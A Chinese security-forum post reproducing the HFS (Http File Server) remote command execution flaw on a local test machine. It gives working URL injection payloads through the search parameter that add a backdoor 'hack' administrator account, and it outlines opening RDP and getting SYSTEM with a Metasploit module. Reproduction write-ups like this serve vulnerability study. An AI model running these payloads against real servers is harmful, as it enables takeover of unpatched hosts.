[原创]HFS远程命令执行漏洞复现-WEB安全-看雪-安全社区|安全招聘|kanxue.com

夏了茶糜.

2020-5-28 14:46

679

漏洞程序下载地址:Http File Server

这里说一下，在Windows server 2003中复现时，我直接使用Administrator用户登录，然后复现，未出现权限问题。再Windows 10中尝试复现时发现权限不足，需要以管理员权限执行漏洞程序。

运行程序截图如下
在这里插入图片描述
尝试访问该软件提供的web服务

web服务是这个样子的，这个web服务的搜索处存在漏洞

一、手工利用

payload如下

1 2	`http://127.0.0.1/?search==%00{.exec\|cmd` `/c 此处替换为dos命令.}` `http://127.0.0.1/?search==%00{.exec\|cmd` `/c 此处替换为dos命令.}`

完整利用过程如下
使用如下payload添加一个管理员账户

1	`http://127.0.0.1/?search==%00{.exec\|cmd` `/c net user hack` `123` `/add.}`

添加用户：hack
密码：123
在这里插入图片描述
将用户hack添加到Administrators组。

1	`http://127.0.0.1/?search==%00{.exec\|cmd` `/c net localgroup Administrators hack` `/add.}`

在这里插入图片描述
开启3389远程端口

使用远程连接工具连接，连接成功。

启动Metasploit，搜索hfs漏洞利用模块
在这里插入图片描述
加载模块，并设置目标IP

设置payload，以及本机IP

开始执行

成功获得system权限

CSDN首发：https://blog.csdn.net/qin9800/article/details/106403462

最后于 2021-8-5 17:00 被夏了茶糜.编辑，原因：添加附件

上传的附件：

收藏・3

免费・1

支持

最新回复 (0)
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

夏了茶糜.

发帖

回帖

RANK

他的文章

看雪公众号